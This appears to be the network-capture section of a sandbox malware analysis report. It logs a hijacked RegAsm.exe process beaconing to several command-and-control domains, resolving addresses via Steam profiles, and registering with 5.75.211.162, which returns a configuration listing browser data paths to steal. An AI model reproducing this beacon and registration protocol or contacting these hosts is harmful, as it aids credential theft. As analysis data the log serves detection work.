Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:20 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 23:38:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:20 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ff4qg05sk74bvmte75aql1hbn8; expires=Mon, 20 Jan 2025 17:24:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBKXGakskibt%2FCPrPtq%2F6DVcKnTGEwP5hC1yWgCxjRI0%2Fwx%2BNNTg89XT%2Fa%2BmgVeVMKPwFwgn%2BEw6eU2iSetGcfAk9F8k4hqn%2BYexGbcrKgeMBV6tQDCwjL1X1GBqHgZREdMZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c971646ab664257-EWR
2024-09-26 23:38:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49748	188.114.97.3	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:21 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 23:38:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:21 UTC	768	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=crv801f136m0biec226d50880p; expires=Mon, 20 Jan 2025 17:25:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X9GLJx2us3jrz1tI9O4ieiUjNBVZI2hJkSqwNHySF8XnouAmGwHDIoIb8WLe7AorUSYOS7I0Sx7oYYKz5qudTzjvLF%2BsTxgcBqBfIgcXfCAYzba5BkOAxszKcp8F1ZCEPyLFV6k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97164c8ce10f8c-EWR
2024-09-26 23:38:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49749	104.21.77.130	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:22 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 23:38:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:23 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4322j0s9edagoduc9p5ft17ln6; expires=Mon, 20 Jan 2025 17:25:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULYPCvp%2FM4W1HBJdE0hcyfoSZ2n%2B2Ay7mGS8Zz1dYVx%2FUliWa3fM0%2B48r7cW0rzMGl%2B0eiaav5BQJesZNK0ZSBd9SyLCvnk1TT2LTHjFQTbaDQlA9bdVEGSV%2Bfoaj%2FA11atV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9716547a2e7d05-EWR
2024-09-26 23:38:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49750	104.102.49.254	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:23 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 23:38:24 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 23:38:24 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=8c09baf18dfc2f18927a7331; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 23:38:24 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 23:38:24 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 23:38:24 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49751	172.67.128.144	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:25 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 23:38:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:25 UTC	798	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i2anjlgpmum0o6kkbve9n8h69u; expires=Mon, 20 Jan 2025 17:25:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3USMKX2H0IF0kt06uZYMw04K7NRQyG1ywhry%2FPp6hN9arHVr8lnK%2FgdNAK4Lew0uUvAcHLWHWoifOQB7mzFT2JNbzK8NKFDVlUrG0a38LxXWRUuYswsmjPw0fUQ4suHL9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9716643a0178d0-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 23:38:25 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49753	104.102.49.254	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:48 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:49 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 23:38:48 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=a310797e9c1fde939ecff45f; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 23:38:49 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 23:38:49 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 23:38:49 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 23:38:49 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49754	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:49 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49755	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:51 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKEBGCGHIDHCBFHIDGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:51 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 30 39 31 36 34 37 42 34 42 43 34 31 35 38 31 33 35 32 33 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 2d 2d 0d Data Ascii: ------JKKEBGCGHIDHCBFHIDGHContent-Disposition: form-data; name="hwid"CA091647B4BC4158135236-a33c7340-61ca------JKKEBGCGHIDHCBFHIDGHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JKKEBGCGHIDHCBFHIDGH--
2024-09-26 23:38:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:52 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 62 39 64 34 36 35 32 33 34 31 64 64 38 30 32 38 64 63 63 35 31 34 64 39 35 33 66 32 38 34 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|3b9d4652341dd8028dcc514d953f2846\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49756	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:52 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 43 46 49 44 41 4b 4a 45 42 47 43 41 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 39 64 34 36 35 32 33 34 31 64 64 38 30 32 38 64 63 63 35 31 34 64 39 35 33 66 32 38 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 43 46 49 44 41 4b 4a 45 42 47 43 41 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 43 46 49 44 41 4b 4a 45 42 47 43 41 46 42 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------AEGHCFIDAKJEBGCAFBAEContent-Disposition: form-data; name="token"3b9d4652341dd8028dcc514d953f2846------AEGHCFIDAKJEBGCAFBAEContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AEGHCFIDAKJEBGCAFBAECont
2024-09-26 23:38:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:53 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49757	5.75.211.162	443	5640	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:54 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
